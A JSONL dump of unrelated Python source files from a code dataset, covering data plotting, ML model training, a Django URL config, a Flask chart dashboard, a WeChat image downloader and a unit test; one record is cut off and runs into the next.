{"seq_id":"613327896","text":"import emoji\nimport datetime\nimport numpy as np\nimport six\nimport matplotlib.pyplot as plt\n\n# Makes accented characters display correctly.\ndef parseString(str):\n t = str.encode('latin1').decode('utf8')\n e = \"\"\n i = 0\n while i < (len(t)):\n if t[i] in emoji.UNICODE_EMOJI:\n e += t[i] + \" \"\n t = t[:i] + ' ' + t[i + 1:]\n i -= 1\n i += 1\n symbols = [\n \",\", \".\", \";\", \":\", \"*\", \"'\", \"\\\"\",\n \"-\", \"_\", \"<\", \">\", \"!\", \"@\", \"#\",\n \"£\", \"¤\", \"$\", \"%\", \"&\", \"/\", \"{\", \"}\",\n \"(\", \")\", \"[\", \"]\", \"=\", \"?\", \"+\", \"´\", \"´´\", \"ˇ\", \"|\"\n ]\n for sy in symbols:\n t = t.replace(sy, \" \")\n return t.strip(), e.strip()\n\n\n# Sum of a dictionary's values.\ndef dictSum(myDict):\n sum = 0\n for i in myDict:\n sum = sum + myDict[i]\n return sum\n\n\ndef on_contenti(msg):\n try:\n c = msg[\"content\"]\n\n return True\n except:\n return False\n\n\ndef plotLisa(largest):\n if largest < 10:\n return 2\n if largest < 100:\n return 20\n if largest < 10000:\n return largest * 0.1\n if largest < 15000:\n return largest * 0.2\n if largest < 35000:\n return largest * 0.2\n if largest < 70000:\n return largest * 0.15\n if largest < 100000:\n return largest * 0.08\n return round(largest * 0.14)\n\n\ndef kuupäev(ts):\n return datetime.datetime.fromtimestamp(ts / 1000.0).date()\n\n\ndef yearmonth(ts):\n kp = kuupäev(ts)\n return (str(kp.year) + str(kp.strftime('%h')))\n\n\ndef algus(messages):\n ts = messages[0][\"timestamp_ms\"]\n return kuupäev(ts)\n\n\ndef lõpp(messages):\n ts = messages[len(messages) - 1][\"timestamp_ms\"]\n return kuupäev(ts)\n\n\ndef save_df(data, filename, row_height=0.625, font_size=14,\n header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',\n bbox=[0, 0, 1, 1], header_columns=0,\n ax=None, **kwargs):\n longest = 0\n for row in data.itertuples():\n for colname in data.columns:\n n = (data.at[row.Index, colname])\n if len(n) > longest:\n longest = len(n)\n if len(colname) > longest:\n longest = len(colname)\n\n tegur = 0.1715\n if longest < 5:\n tegur = 0.24\n if longest < 10:\n tegur = 0.2\n if longest < 31:\n tegur = 0.18\n\n col_width 
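# --- Illustrative sketch (added; not part of the original dataset records) ---
# q_l6m_tilt_fun above normalizes a complex q6 bond-order vector, and
# disorder_fun averages its inner product with each neighbour's vector; for
# two identical local environments that (complex) dot product equals 1.
import numpy as np

q_i = np.array([1 + 1j, 2.0, 3j])
q_i = q_i / np.sqrt(np.sum(np.abs(q_i) ** 2))   # same normalization as q_l6m_tilt_fun
q_j = q_i.copy()                                # a perfectly matching neighbour
print(np.round(np.dot(q_i, np.conj(q_j)), 6))   # (1+0j)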
= longest * tegur\n if ax is None:\n size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])\n fig, ax = plt.subplots(figsize=size)\n ax.axis('off')\n\n mpl_table = ax.table(cellText=data.values, bbox=bbox, colLabels=data.columns, **kwargs)\n\n mpl_table.auto_set_font_size(False)\n mpl_table.set_fontsize(font_size)\n\n for k, cell in six.iteritems(mpl_table._cells):\n cell.set_edgecolor(edge_color)\n if k[0] == 0 or k[1] < header_columns:\n cell.set_text_props(weight='bold', color='w')\n cell.set_facecolor(header_color)\n else:\n cell.set_facecolor(row_colors[k[0] % len(row_colors)])\n ax.get_figure().savefig(\"results\\\\plots\\\\\" + filename)\n plt.close()\n\n\ndef kellaaeg(timestamp):\n return datetime.datetime.fromtimestamp(timestamp / 1000.0).time()\n","sub_path":"abistajad.py","file_name":"abistajad.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317119696","text":"# pylint: disable=W0611\n'''Regression model trained on different types of drift accuracy on original model.'''\nimport numpy as np\n\nfrom joblib import load, dump\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n\nfrom train_model.text_preprocessing import prepare, _extract_message_len, _text_process\nfrom train_model.util import load_data, DATASET_DIR, DATA_DRIFT_DIR\nfrom deploy_model.util import load_best_clf\n\nclass RegressionModel():\n '''Class containing the Regression Model training methods.'''\n datasets: list\n drift_detector: any\n classifier: any\n preprocessor: any\n\n def __init__(self) -> None:\n self.set_datasets()\n self.drift_detector = SVR()\n self.classifier, _ = load_best_clf()\n self.preprocessor = load('output/preprocessor.joblib')\n\n def set_datasets(self):\n '''Set the datasets to train model on.'''\n self.datasets = [DATASET_DIR + 'SMSSpamCollection',\n DATA_DRIFT_DIR + 'drift_flip.txt',\n DATA_DRIFT_DIR + 'drift_random_0.5.txt',\n DATA_DRIFT_DIR + 'drift_mutation.txt',\n DATA_DRIFT_DIR + 'drift_concept.txt',\n DATA_DRIFT_DIR + 'drift_ham_only.txt',\n DATA_DRIFT_DIR + 'drift_spam_only.txt']\n\n def train_regression_model(self):\n '''Trains the regression model on all supplied datasets.'''\n percentiles_stats = []\n scores = []\n\n for index, data_set in enumerate(self.datasets):\n raw_data = load_data(data_set)\n for batch in range(25):\n print(f\"Train logistic drift detector epoch {batch}, dataset {index}\")\n\n x_sample, _ = train_test_split(raw_data, test_size=0.3, random_state=batch)\n y_sample = x_sample['label']\n x_sample = self.preprocessor.transform(x_sample['message'])\n\n classifier_stats = [x[0] for x in self.classifier.predict_proba(x_sample)]\n classifier_res = self.classifier.predict(x_sample)\n print(accuracy_score(classifier_res, y_sample))\n\n percentiles_stats += [\n [np.percentile(classifier_stats, i) for i in range(0, 101, 5)]]\n scores += [accuracy_score(classifier_res, y_sample)]\n\n self.drift_detector.fit(percentiles_stats, scores)\n dump(self.drift_detector, 'output/regression/regression_model.joblib')\n\n\nif __name__ == \"__main__\":\n RegressionModel().train_regression_model()\n","sub_path":"train_model/regression_model.py","file_name":"regression_model.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496140979","text":"# -*- coding: utf-8 
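# --- Illustrative sketch (added; not part of the original dataset records) ---
# The drift detector above summarizes each batch of predict_proba outputs by
# its 0..100th percentiles in steps of 5 (a 21-dim vector) and regresses the
# batch accuracy on it; the same construction on synthetic scores:
import numpy as np
from sklearn.svm import SVR

rng = np.random.default_rng(0)
batches = [rng.beta(2, 2, size=500) for _ in range(30)]        # stand-in probabilities
X = [[np.percentile(b, i) for i in range(0, 101, 5)] for b in batches]
y = rng.uniform(0.8, 1.0, size=len(batches))                   # stand-in accuracies
detector = SVR().fit(X, y)
print(detector.predict(X[:2]))                                 # estimated accuracies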
-*-\n\"\"\"\nCreated on Sun Nov 29 12:10:19 2020\n\n@author: Daniel.Feeney\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n# Read in files\n# only read .asc files for this work\nfPath = 'C:/Users/kate.harrison/Dropbox (Boa)/EndurancePerformance/NewBalanceRoadRacing_Jan2020/PressureData/'\nfileExt = r\".mva\"\nentries = [fName for fName in os.listdir(fPath) if fName.endswith(fileExt)]\n\n# Define constants and options\nfThresh = 30 #below this value will be set to 0.\nstepLen = 45 #Set value to look forward \n# list of functions \n# finding landings on the force plate once the filtered force exceeds the force threshold\ndef findLandings(force):\n lic = []\n for step in range(len(force)-1):\n if force[step] == 0 and force[step + 1] >= fThresh:\n lic.append(step)\n return lic\n\n#Find takeoff from FP when force goes from above thresh to 0\ndef findTakeoffs(force):\n lto = []\n for step in range(len(force)-1):\n if force[step] >= fThresh and force[step + 1] == 0:\n lto.append(step + 1)\n return lto\n\n### File Structure: Dorsal Forefoot, Metatarsals (.1), Midfoot (.2), plantar mets (.3), plantar toes (.4), plantar heel (.5)\nsdFF = []\nmeanFF = []\nsdMF = []\nmeanMF = []\nsdMets = []\nmeanMets = []\nmaxMF = []\nmaxFF = []\nmaxMets = []\n\nsdPlantMetP = []\nmeanPlantMetP = []\nsdToeP = []\nmeanToeP = []\nsdHeelP = []\nmeanHeelP = []\nmaxPlantMetP = []\nmaxToeP = []\nmaxHeelP = []\n\nHeelPMidStance = []\nHeelRateDecay = []\ntrial = []\nSubject = []\nCondition = []\nConfig = []\n\n#first columns (FF, Mets, and MF) all relate to dorsal values. Once you get to PlantMetsForce it is plantar metatarsal force \n#and everything to the right of that column is plantar side. Each location (e.g. FF, MF, etc.) has force, max Pressure, Mean Pressure, and pct\n\nfor file in entries:\n try:\n \n fName = file #Load one file at a time\n \n subName = fName.split(sep = \"_\")[0]\n ConditionTmp = fName.split(sep=\"_\")[1]\n ConfigTmp = fName.split(sep=\"_\")[2]\n \n dat = pd.read_csv(fPath+fName,sep='\\t', skiprows = 15, header = 0)\n \n dat.columns = ['Time','FFForce', 'FFMaxP', 'FFMeanP', 'FFpct', 'MetsForce', 'MetsMaxP', 'MetsMeanP','Metspct', \n 'MFForce','MFMaxP', 'MFMeanP', 'MFpct', 'PlantMetsForce','PlantMetsMaxP', 'PlantMetsMeanP', 'PlantMetsPct',\n 'ToesForce','ToesMaxP','ToesMeanP','ToesPct','HeelForce', 'HeelMaxP', 'HeelMeanP','HeelPct']\n dat['Force'] = dat.HeelForce + dat.ToesForce + dat.PlantMetsForce\n # filtering force to find landings/takeoffs \n forceTot = dat.Force\n forceTot[forceTot go.Scatter:\n\n data = line.load(start, end)\n mode = ''\n linestyle = None\n marker = None\n if line.linestyle:\n mode = 'lines'\n dash_dict = {'-': 'solid', ':': 'dot', '.': 'dot', '--': 'dash', '-.': 'dashdot'}\n linestyle = {'color': line.color, 'dash': dash_dict[line.linestyle], 'width': line.linewidth}\n if line.marker:\n mode = 'lines+markers' if mode else 'markers'\n symboldict = {'o': 'circle', 'x': 'x-thin', ',': 'line-ns', '+': 'cross-thin', '*': 'asterisk', '.': 'circle'}\n if line.marker in symbols:\n symbol = line.marker\n else:\n symbol = symboldict.get(line.marker, 'circle')\n\n marker = {'color': line.color, 'symbol': symbol}\n\n return go.Scatter(x=data.index, y=data, mode=mode, line=linestyle, marker=marker, name=line.name)\n\n\ndef _make_figure(plot: Plot) -> go.Figure:\n rows = -(-len(plot.subplots) // plot.columns)\n fig = make_subplots(rows, plot.columns, shared_xaxes=True)\n subplot_positions = sum(([i] * len(sp.lines) for i, sp in 
enumerate(plot.subplots)), [])\n rows = [1 + i // plot.columns for i in subplot_positions]\n cols = [1 + i % plot.columns for i in subplot_positions]\n for i, sp in enumerate(plot.subplots):\n row, col = 1 + i // plot.columns, 1 + i % plot.columns\n if sp.ylim:\n fig.update_yaxes(range=list(sp.ylim), row=row, col=col)\n\n fig.update_yaxes()\n fig.add_traces(\n [\n _draw_line(l, plot.start, plot.end)\n for l in plot.lines()\n ],\n rows=rows,\n cols=cols\n )\n\n fig.update_yaxes()\n fig.update_layout(width=plot.size[0], height=plot.size[1], template='none')\n return fig\n\n\ndef to_image(plot: Plot, format: str) -> bytes:\n \"\"\"\n Draws the plot and returns a byte string containing the image\n \"\"\"\n fig = _make_figure(plot)\n return fig.to_image(format=format)\n\n\ndef to_html(plot: Plot)->bytes:\n \"\"\"\n Draws the plot to include into an html page, here as svg.\n Alternative could be as an element with base64 data\n \"\"\"\n fig = _make_figure(plot)\n return fig.to_html(include_plotlyjs='cdn').encode('utf-8')\n\n\nsymbols = [\n \"circle\", \"circle-open\", \"circle-dot\", \"circle-open-dot\",\n \"square\", \"square-open\", \"square-dot\", \"square-open-dot\",\n \"diamond\", \"diamond-open\", \"diamond-dot\", \"diamond-open-dot\",\n \"cross\", \"cross-open\", \"cross-dot\", \"cross-open-dot\", \"x\",\n \"x-open\", \"x-dot\", \"x-open-dot\", \"triangle-up\",\n \"triangle-up-open\", \"triangle-up-dot\", \"triangle-up-open-dot\",\n \"triangle-down\", \"triangle-down-open\", \"triangle-down-dot\",\n \"triangle-down-open-dot\", \"triangle-left\", \"triangle-left-open\",\n \"triangle-left-dot\", \"triangle-left-open-dot\", \"triangle-right\",\n \"triangle-right-open\", \"triangle-right-dot\", \"triangle-right-open-dot\",\n \"triangle-ne\", \"triangle-ne-open\", \"triangle-ne-dot\",\n \"triangle-ne-open-dot\", \"triangle-se\", \"triangle-se-open\",\n \"triangle-se-dot\", \"triangle-se-open-dot\", \"triangle-sw\", \"triangle-sw-open\", \"triangle-sw-dot\", \"triangle-sw-open-dot\" ,\n \"triangle-nw\", \"triangle-nw-open\", \"triangle-nw-dot\" ,\n \"triangle-nw-open-dot\", \"pentagon\", \"pentagon-open\", \"pentagon-dot\",\n \"pentagon-open-dot\", \"hexagon\", \"hexagon-open\", \"hexagon-dot\", \"hexagon-open-dot\", \"hexagon2\", \"hexagon2-open\", \"hexagon2-dot\", \"hexagon2-open-dot\", \"octagon\", \"octagon-open\",\n \"octagon-dot\", \"octagon-open-dot\", \"star\", \"star-open\",\n \"star-dot\", \"star-open-dot\", \"hexagram\", \"hexagram-open\",\n \"hexagram-dot\", \"hexagram-open-dot\", \"star-triangle-up\", \"star-triangle-up-open\", \"star-triangle-up-dot\", \"star-triangle-up-open-dot\" ,\n \"star-triangle-down\", \"star-triangle-down-open\", \"star-triangle-down-dot\",\n \"star-triangle-down-open-dot\", \"star-square\", \"star-square-open\", \"star-square-dot\", \"star-square-open-dot\", \"star-diamond\" ,\n \"star-diamond-open\", \"star-diamond-dot\", \"star-diamond-open-dot\" ,\n \"diamond-tall\", \"diamond-tall-open\", \"diamond-tall-dot\" ,\n \"diamond-tall-open-dot\", \"diamond-wide\", \"diamond-wide-open\" ,\n \"diamond-wide-dot\", \"diamond-wide-open-dot\", \"hourglass\" ,\n \"hourglass-open\", \"bowtie\", \"bowtie-open\", \"circle-cross\" ,\n \"circle-cross-open\", \"circle-x\", \"circle-x-open\", \"square-cross\" ,\n \"square-cross-open\", \"square-x\", \"square-x-open\", \"diamond-cross\",\n \"diamond-cross-open\", \"diamond-x\", \"diamond-x-open\",\n \"cross-thin\", \"cross-thin-open\", \"x-thin\", \"x-thin-open\",\n \"asterisk\", \"asterisk-open\", \"hash\", 
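# --- Illustrative sketch (added; not part of the original dataset records) ---
# _make_figure above places subplot i at a 1-based (row, col) via integer
# division and modulo; the mapping for a 2-column grid looks like this.
columns = 2
for i in range(5):
    row, col = 1 + i // columns, 1 + i % columns
    print(i, "->", (row, col))  # 0->(1,1) 1->(1,2) 2->(2,1) 3->(2,2) 4->(3,1)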
\"hash-open\",\n \"hash-dot\", \"hash-open-dot\", \"y-up\", \"y-up-open\", \"y-down\",\n \"y-down-open\", \"y-left\", \"y-left-open\", \"y-right\", \"y-right-open\", \"line-ew\", \"line-ew-open\", \"line-ns\", \"line-ns-open\", \"line-ne\", \"line-ne-open\", \"line-nw\" ,\n \"line-nw-open\", \"arrow-up\", \"arrow-up-open\", \"arrow-down\" ,\n \"arrow-down-open\", \"arrow-left\", \"arrow-left-open\", \"arrow-right\" ,\n \"arrow-right-open\", \"arrow-bar-up\", \"arrow-bar-up-open\" ,\n \"arrow-bar-down\", \"arrow-bar-down-open\", \"arrow-bar-left\" ,\n \"arrow-bar-left-open\", \"arrow-bar-right\", \"arrow-bar-right-open\"\n]\n","sub_path":"odmf/plot/draw_plotly.py","file_name":"draw_plotly.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"188795432","text":"from django.conf.urls import patterns, include, url\nfrom comics.feeds import LatestEntriesFeed\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'threepanel.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', 'comics.views.home', name='home'),\n url(r'^manage', 'comics.views.manage', name='manage'),\n url(r'^dashboard/', include('dashboard.urls')),\n url(r'^comics/', include('comics.urls')),\n url(r'^subscribe/', include('publish.urls')),\n url(r'^pages/', include('pages.urls')),\n url(r'^subscribe$', 'publish.views.subscribe'),\n url(r'rss.xml', LatestEntriesFeed())\n)\n","sub_path":"threepanel/threepanel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129479998","text":"import re\nimport requests\nfrom urllib import request\nresp = requests.get(url='http://mp.weixin.qq.com/s/Z6OeRHUfiUyKIV-KG7Eb8w')\nregx = \"https://mmbiz.qpic.cn/mmbiz_jpg/.*?wx_fmt=jpeg\"\npic = re.findall(regx,resp.text)\nstorePATH = \"/Users/fangdongliang/Desktop/pic/\"\ncount = 0\nfor item in pic:\n\tcount += 1\n\tfilename = storePATH+str(count)+\".jpeg\" \n\twith request.urlopen(item) as stream:\n\t\tpic_stream = stream.read()\n\twith open(filename,\"wb\") as outfile:\n\t\toutfile.write(pic_stream)\n\t\t","sub_path":"Others/wx_pic_spider.py","file_name":"wx_pic_spider.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399167891","text":"from flask import Flask, render_template\nimport pandas as pd\nimport time\n\napp = Flask(__name__)\ndata = pd.read_csv(\"data/data.csv\")\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index(chart1ID='chart1_ID', chart1_type='bar',\n chart2ID='chart2_ID', chart2_type='bar',\n chart3ID='chart3_ID', chart3_type='column',\n chart4ID='chart4_ID',\n chart5ID='chart5_ID', chart5_type='bar',\n chart6ID='chart6_ID', chart6_type='column'):\n # Chart1\n maleCount = data[data['Gender'] == 'M'][\"Gender\"].count()\n femaleCount = data[data['Gender'] == 'F'][\"Gender\"].count()\n total = maleCount + femaleCount\n malePercentage = ((maleCount / total) * 100).round(2)\n femalePercentage = ((femaleCount / total) * 100).round(2)\n\n chart1 = {\"renderTo\": chart1ID, \"type\": chart1_type}\n series1 = [{\"name\": 'Male', \"data\": [malePercentage], \"color\": \"#00FFFF\"},\n {\"name\": 'Female', \"data\": [femalePercentage], \"color\": \"#DC143C\"}]\n title1 = {\"text\": 'Male vs Female Ratio'}\n xAxis1 = {\"categories\": ['Gender']}\n yAxis1 = {\"title\": {\"text\": 'Percentage 
(%)'}}\n plotOptions1 = {\"bar\": {\"stacking\": \"normal\", 'dataLabels': {'enabled': 'true'}}}\n tooltip1 = {\"borderRadius\": \"20\"}\n credits = {\"text\": 'Made by VARUN NAGRARE', \"href\": 'https://www.facebook.com/Wolvarun9295',\n \"style\": {\"fontSize\": '10px', 'color': \"#FF0000\"}}\n\n ###################################################################################################################\n # Chart2\n python = []\n automation = []\n nodejs = []\n java = []\n ios = []\n devops = []\n de = []\n ml = []\n\n python.append(data[data['Technology'] == 'Python'][\"Technology\"].count())\n automation.append(data[data['Technology'] == 'Automation'][\"Technology\"].count())\n nodejs.append(data[data['Technology'] == 'NodeJs'][\"Technology\"].count())\n java.append(data[data['Technology'] == 'Java'][\"Technology\"].count())\n ios.append(data[data['Technology'] == 'IOS'][\"Technology\"].count())\n devops.append(data[data['Technology'] == 'DevOps'][\"Technology\"].count())\n de.append(data[data['Technology'] == 'Data Engineering'][\"Technology\"].count())\n ml.append(data[data['Technology'] == 'Machine Learning'][\"Technology\"].count())\n\n chart2 = {\"renderTo\": chart2ID, \"type\": chart2_type}\n series2 = [\n {\"name\": 'Automation', \"data\": automation, \"color\": \"#FF8000\"},\n {\"name\": 'Data Engineering', \"data\": de, \"color\": \"#CD00FF\"},\n {\"name\": 'DevOps', \"data\": devops, \"color\": \"#0027FF\"},\n {\"name\": 'IOS', \"data\": ios, \"color\": \"#00FFFF\"},\n {\"name\": 'Java', \"data\": java, \"color\": \"#74FF00\"},\n {\"name\": 'Machine Learning', \"data\": ml, \"color\": \"#FF00A2\"},\n {\"name\": 'NodeJS', \"data\": nodejs, \"color\": \"#FFF300\"},\n {\"name\": 'Python', \"data\": python, \"color\": \"#FF0000\"},\n ]\n title2 = {\"text\": 'Techwise Bar Chart'}\n xAxis2 = {\"categories\": ['Technology']}\n yAxis2 = {\"title\": {\"text\": 'No. of People'}}\n plotOptions2 = {\"bar\": {'dataLabels': {'enabled': 'true'}}}\n\n ###################################################################################################################\n # Chart3\n labX = data[data['Lab'] == 'Bangalore']['Lab'].count()\n labY = data[data['Lab'] == 'Mumbai']['Lab'].count()\n chart3 = {\"renderTo\": chart3ID, \"type\": chart3_type, \"polar\": \"true\", \"inverted\": \"true\"}\n series3 = [{\"name\": 'Bangalore', \"data\": [labX], \"color\": \"#B500FE\"},\n {\"name\": 'Mumbai', \"data\": [labY], \"color\": \"#00FE7B\"}]\n title3 = {\"text\": 'Distribution of People in Lab X and Y'}\n xAxis3 = {\"categories\": ['LAB']}\n yAxis3 = {\"crosshair\": {\"enabled\": \"true\", \"color\": \"#333\"}}\n plotOptions3 = {\"column\": {'dataLabels': {'enabled': 'true'}}}\n pane3 = {\"size\": \"85%\", \"innerSize\": \"20%\", \"endAngle\": \"300\"}\n\n ###################################################################################################################\n # Chart4\n technology = []\n people = []\n for i in data.Technology.unique():\n technology.append(i)\n people.append(data[data['Technology'] == i][\"Technology\"].count())\n chart4 = {\"renderTo\": chart4ID}\n series4 = [{\"type\": \"areaspline\", \"name\": 'Technologies (Areaspline Chart)', \"data\": people, \"color\": \"#FF1493\"},\n {\"type\": \"column\", \"name\": 'Technologies (Column Chart)', \"data\": people, \"color\": \"#006CFE\"}]\n title4 = {\"text\": 'Techwise Distribution Chart'}\n xAxis4 = {\"categories\": technology}\n yAxis4 = {\"title\": {\"text\": 'No. 
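# --- Illustrative sketch (added; not part of the original dataset records) ---
# The chart4 block above runs one filter pass per unique technology;
# value_counts() yields the same categories and counts in a single call.
import pandas as pd

data = pd.DataFrame({'Technology': ['Python', 'Java', 'Python', 'IOS']})
counts = data['Technology'].value_counts()
technology = counts.index.tolist()   # x-axis categories
people = counts.tolist()             # series data, e.g. [2, 1, 1]
print(technology, people)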
of People'}}\n plotOptions4 = {\"areaspline\": {'dataLabels': {'enabled': 'true'}}, \"column\": {'dataLabels': {'enabled': 'true'}}}\n\n ###################################################################################################################\n # Chart5\n company = []\n for i in data.Company.unique():\n company.append(i)\n\n company.sort()\n\n dataFrame = data\n dataFrame.rename(columns={'Unnamed: 0': 'id'}, inplace=True)\n dataFrame = dataFrame[['Technology', 'Company', 'id']]\n techCount = dataFrame.groupby([\"Technology\", \"Company\"])[\"id\"].count().unstack(fill_value=0).stack().reset_index(\n name=\"count\")\n techList = techCount[\"Technology\"].unique().tolist()\n\n finalList = []\n for tech in techList:\n tech = techCount[techCount[\"Technology\"].str.contains(tech)]\n finalList.append(tech)\n\n automation = finalList[0]['count'].tolist()\n de = finalList[1]['count'].tolist()\n devops = finalList[2]['count'].tolist()\n ios = finalList[3]['count'].tolist()\n java = finalList[4]['count'].tolist()\n ml = finalList[5]['count'].tolist()\n nodejs = finalList[6]['count'].tolist()\n python = finalList[7]['count'].tolist()\n\n chart5 = {\"renderTo\": chart5ID, \"type\": chart5_type}\n series5 = [\n {\"name\": 'Automation', \"data\": automation, \"color\": \"#CC00FE\"},\n {\"name\": 'Data Engineering', \"data\": de, \"color\": \"#006CFE\"},\n {\"name\": 'DevOps', \"data\": devops, \"color\": \"#FE0068\"},\n {\"name\": 'IOS', \"data\": ios, \"color\": \"#FE00BD\"},\n {\"name\": 'Java', \"data\": java, \"color\": \"#00FE45\"},\n {\"name\": 'Machine Learning', \"data\": ml, \"color\": \"#FEEB00\"},\n {\"name\": 'NodeJS', \"data\": nodejs, \"color\": \"#FE8300\"},\n {\"name\": 'Python', \"data\": python, \"color\": \"#FE0000\"}\n ]\n title5 = {\"text\": 'Company vs Technologies Stacked Bar Chart'}\n xAxis5 = {\"categories\": company, \"title\": {\"text\": \"Companies\"}}\n yAxis5 = {\"title\": {\"text\": \"No. 
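# --- Illustrative sketch (added; not part of the original dataset records) ---
# The chart5 block above uses .unstack(fill_value=0).stack() so that
# (Technology, Company) pairs with no rows still appear with count 0, keeping
# every series the same length for stacked bars.
import pandas as pd

df = pd.DataFrame({'Technology': ['Python', 'Python', 'Java'],
                   'Company': ['A', 'B', 'A'],
                   'id': [1, 2, 3]})
counts = (df.groupby(['Technology', 'Company'])['id'].count()
            .unstack(fill_value=0)   # the missing (Java, B) pair becomes 0
            .stack()
            .reset_index(name='count'))
print(counts)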
of People\"}}\n plotOptions5 = {\"bar\": {\"stacking\": \"normal\"}}\n tooltip2 = {\"borderRadius\": \"20\", \"shared\": \"true\"}\n\n ###################################################################################################################\n # Chart6\n lab = []\n for i in data.Lab.unique():\n lab.append(i)\n\n dataFrame = data\n dataFrame.rename(columns={'Unnamed: 0': 'id'}, inplace=True)\n dataFrame = dataFrame[['Gender', 'Lab', 'id']]\n sexCount = dataFrame.groupby([\"Gender\", \"Lab\"])[\"id\"].count().unstack(fill_value=0).stack().reset_index(\n name=\"count\")\n genderList = sexCount[\"Gender\"].unique().tolist()\n\n finalList = []\n for sex in genderList:\n sex = sexCount[sexCount[\"Gender\"].str.contains(sex)]\n finalList.append(sex)\n\n female = finalList[0]['count'].tolist()\n male = finalList[1]['count'].tolist()\n\n chart6 = {\"renderTo\": chart6ID, \"type\": chart6_type, \"polar\": \"true\", \"inverted\": \"true\"}\n series6 = [{\"name\": 'Male', \"data\": male, \"color\": \"#00FFFF\"},\n {\"name\": 'Female', \"data\": female, \"color\": \"#DC143C\"}]\n title6 = {\"text\": \"Distribution of Males and Females in Lab X and Y\"}\n xAxis6 = {\"categories\": lab}\n yAxis6 = {\"crosshair\": {\"enabled\": \"true\", \"color\": \"#333\"}}\n plotOptions6 = {\"column\": {'dataLabels': {'enabled': 'true'}}}\n pane6 = {\"size\": \"85%\", \"innerSize\": \"20%\", \"endAngle\": \"300\"}\n\n return render_template('index.html',\n chart1ID=chart1ID, chart1=chart1, series1=series1, title1=title1,\n xAxis1=xAxis1, yAxis1=yAxis1, plotOptions1=plotOptions1, tooltip1=tooltip1, credits=credits,\n chart2ID=chart2ID, chart2=chart2, series2=series2, title2=title2, xAxis2=xAxis2,\n yAxis2=yAxis2, plotOptions2=plotOptions2, tooltip2=tooltip2,\n chart3ID=chart3ID, chart3=chart3, series3=series3, title3=title3, xAxis3=xAxis3,\n yAxis3=yAxis3, plotOptions3=plotOptions3, pane3=pane3,\n chart4ID=chart4ID, chart4=chart4, series4=series4, title4=title4, xAxis4=xAxis4,\n yAxis4=yAxis4, plotOptions4=plotOptions4,\n chart5ID=chart5ID, chart5=chart5, series5=series5, title5=title5, xAxis5=xAxis5,\n yAxis5=yAxis5, plotOptions5=plotOptions5,\n chart6ID=chart6ID, chart6=chart6, series6=series6, title6=title6, xAxis6=xAxis6,\n yAxis6=yAxis6, plotOptions6=plotOptions6, pane6=pane6,\n reload=time.time())\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378184703","text":"#Importing libraries\r\nfrom detecto import core, utils\r\nfrom detecto.visualize import show_labeled_image, plot_prediction_grid\r\nfrom torchvision import transforms\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n#Image augmentation\r\ncustom_transforms = transforms.Compose([\r\ntransforms.ToPILImage(),\r\ntransforms.Resize(900),\r\ntransforms.RandomHorizontalFlip(0.5),\r\ntransforms.ColorJitter(saturation=0.2),\r\ntransforms.ToTensor(),\r\nutils.normalize_transform(),\r\n])\r\n\r\n#Model training\r\nTrain_dataset = core.Dataset('images/', transform=custom_transforms)#L1\r\nTest_dataset = core.Dataset('images/')#L2\r\nloader = core.DataLoader(Train_dataset, batch_size=2, shuffle=True)#L3\r\nmodel = core.Model(['dog'])#L4\r\nlosses = model.fit(loader, Test_dataset, epochs=25, lr_step_size=5, learning_rate=0.001, verbose=True)#L5\r\n\r\n#Model saving\r\nmodel.save('custom_model_weights.pth')\r\n\r\n\r\n#Inputting test image\r\nimage = 
utils.read_image('images/dog/n02085620_574.jpg')\r\n\r\n#Initializes the trained model\r\nmodel = core.Model.load('custom_model_weights.pth', ['dog'])\r\n\r\n#Evaluating model\r\nlabels, boxes, scores = model.predict_top(image)\r\n\r\n#Outputting predictions\r\nshow_labeled_image(image, boxes, labels)\r\nprint(labels, boxes, scores)\r\nplt.plot(losses)\r\nplt.show()\r\n","sub_path":"AI & ML/pytorch detecto training and prediction tutorial.py","file_name":"pytorch detecto training and prediction tutorial.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260598914","text":"import unittest\nfrom unittest import mock\n\nfrom Week6B.book import Book\n\n\nclass BookTestSuite(unittest.TestCase):\n def test_init_correctParameters_setAllNecessaryAttributes(self):\n b = Book(\"132350882\", \"Clean Code\", \"Robert C. Martin\")\n self.assertEqual(b.isbn, \"132350882\", \"-0.25: ISBN is not set!\")\n self.assertEqual(b.title, \"Clean Code\", \"-0.25: title is not set!\")\n self.assertEqual(b.author, \"Robert C. Martin\", \"-0.25: author is not set!\")\n self.assertIsNone(b.price, \"-0.25: price is not set!\")\n\n def test_set_price_10_setThePriceTo10(self):\n b = Book(\"132350882\", \"Clean Code\", \"Robert C. Martin\")\n expected_price = 10\n b.set_price(expected_price)\n self.assertEqual(expected_price, b.price)\n\n def test_open_noArgs_printCorrectText(self):\n title = \"Clean Code\"\n author = \"Robert C. Martin\"\n b = Book(\"132350882\", title, author)\n print_mock = mock.MagicMock()\n\n with mock.patch(\"builtins.print\", print_mock):\n b.open()\n\n print_mock.assert_called_with(\"The {} written by {} is opened.\".format(title, author))\n\n\nif 